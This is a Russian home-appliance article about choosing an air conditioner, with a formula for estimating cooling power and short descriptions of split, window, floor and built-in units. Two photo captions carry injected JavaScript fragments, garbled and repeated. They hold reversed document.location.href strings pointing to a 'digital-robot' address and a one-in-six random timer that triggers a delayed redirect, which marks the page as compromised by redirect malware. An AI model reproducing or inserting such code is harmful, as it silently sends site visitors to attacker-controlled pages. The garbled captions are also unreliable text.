Добавить в закладки

Хладнокровный расчет: 3 кондиционера для вашего дома и формула распределения мощности

В знойный день или во времена до начала отопительного сезона приятно осознавать, что нажатием всего лишь одной кнопки на пульте управления кондиционера можно создать комфортный температурный режим в своем доме. Если у вас еще нет этой чудо-техники, и вы намерены отправится на ее поиски в магазины – эта статья для вас. Мы предлагаем разобраться каких принципов стоит придерживаться, делая не такую уж дешевую покупку.

Кондиционер для дома

Кондиционер для дома. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to-shtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tory.ru»>prostobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to-shtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tory.ru

В первую очередь решите для чего именно вам нужен кондиционер

В современных моделях, кроме главной функции охлаждения или нагрева воздуха, могут быть дополнительные. К примеру, режим очищения, увлажнения или сушка воздуха, воздухообмен с помощью сбора воздуха с улицы, ионизация воздуха, самоочистка, комплектация дополнительными фильтрами, оповещения о неполадках. Наличие их в системе существенно повышает стоимость. Также цена варьируется в зависимости от параметра уровня шума. Идеальным нераздражающим показателем считается цифра в пределах 25-35 децибел.

Мощность кондиционера – главная характеристика

Ориентировочный расчет можно провести по такой формуле:

Q = Q1 + Q2 + Q3

Q1 = теплопритоки от окна, стен, пола и потолка.

Q1 = S * h * q / 1000

S — площадь помещения в квадратных метрах.

h — высота помещения в метрах.

q — коэффициент, равный 30 — 40 Вт/кб. м: q = 30 для затененного помещения, q = 35 при средней освещенности, q = 40 для помещений, в которые попадает много солнечного света.

Q2 — сумма теплопритоков от людей.

Теплопритоки от взрослого человека: 0,1 кВт — в спокойном состоянии, 0,13 кВт — при легком движении, 0,2 кВт — при физической нагрузке;

Q3 — сумма теплопритоков от бытовых приборов.

Теплопритоки от бытовых приборов: 0,3 кВт — от компьютера, 0,2 кВт — от телевизора, а другие приборы выделяют в виде тепла 30% от максимальной потребляемой мощности.

Мощность выбранного кондиционера должна лежать в диапазоне от -5% до +15% расчетной мощности Q. Эта методика приблизительна и применима для расчета в небольших по площади зданиях.

Внешние различия

Сплит-система подразумевает собой кондиционер, состоящий из внутреннего (домашнего) блока и наружного (крепящегося на улице).

Сплит-система 

Сплит-система . Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to.com»>mitsushitobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to.com

Моноблок бывает оконным и напольным. Первый крепится в оконном проеме, а второй можно ставить на полу и при необходимости перемещать по квартире.

Оконный моноблок

Оконный моноблок. Фото: stroiremdoma.ru

Существенным недостатком таких систем считается труба для забора воздуха, проходящая через окно.

Моноблок напольный

Моноблок напольный. Фото: servis-climat.ru

Встраиваемые блоки, как правило, монтируются в стену, пол или шкаф во время ремонта. Если вы приобретаете его в готовое помещение, то придется «разворотить» домашнюю обстановку.

Встроенные системы в потолок

Встроенные системы в потолок. Фото: vegaclimat.com.ua

Надеемся, что приведенная информация поможет вам сделать удачную покупку.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 23.06.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: